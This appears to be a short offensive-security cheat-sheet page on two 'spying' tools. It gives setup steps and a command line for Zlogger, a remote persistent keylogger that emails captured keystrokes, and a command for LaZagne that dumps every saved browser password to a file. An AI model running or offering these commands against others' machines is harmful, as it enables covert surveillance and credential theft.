Spying Software

Zlogger

  • Remote persistent keylogger for Windows and Linux.

  • Before start go to your google account and go to the google sign in section and click on app passwords, generate an app password.

  • Copy that password to auth with the program.

Usage

zlogger -i 60 --windows -e 'test@email' -p 'password' -o <output_filename>'

LaZagne

  • The LaZagne project is an open-source application used to retrieve lots of passwords stored on a local computer.

  • Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.).

  • This tool has been developed for the purpose of finding these passwords for the most commonly used software.

  • LaZagne have's different modules to target programs, browsers, etc.

Usage

./LaZagne.exe browsers -oN <output_file_with_recovered_passwords>
  • Here we are getting all saved passwords on the browsers using the browser module.

  • There are a lot more modules to try, you can see it in the LaZagne repository.

Last updated